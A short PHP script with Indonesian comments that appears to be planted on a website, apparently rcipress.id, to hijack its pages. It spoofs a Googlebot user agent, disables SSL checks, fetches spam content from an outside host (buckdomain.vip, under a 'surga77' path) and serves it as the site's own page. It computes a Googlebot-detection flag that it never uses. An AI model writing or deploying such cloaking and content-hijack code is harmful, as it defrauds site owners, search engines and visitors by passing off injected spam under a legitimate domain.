<?php
// ============================
// KONFIGURASI
// ============================
$target = 'https://buckdomain.vip/zlxvii/surga77-rcipress.id-about.html';

// ============================
// DETEKSI USER AGENT
// ============================
$agent = $_SERVER['HTTP_USER_AGENT'] ?? '';

$isGoogle = (
    stripos($agent, 'googlebot') !== false ||
    stripos($agent, 'google-inspectiontool') !== false
);

// ============================
// FETCH MIRROR UNTUK GOOGLE
// ============================
$context = stream_context_create([
    'http' => [
        'method'  => 'GET',
        'header'  => "User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n",
        'timeout' => 10
    ],
    'ssl' => [
        'verify_peer'      => false,
        'verify_peer_name' => false
    ]
]);

$html = @file_get_contents($target, false, $context);

// ============================
// OUTPUT
// ============================
if ($html !== false && strlen($html) > 100) {
    header("Content-Type: text/html; charset=UTF-8");
    echo $html;
    exit;
}

// ============================
// FAILBACK
// ============================
http_response_code(502);
echo "Mirror tidak tersedia";
?>
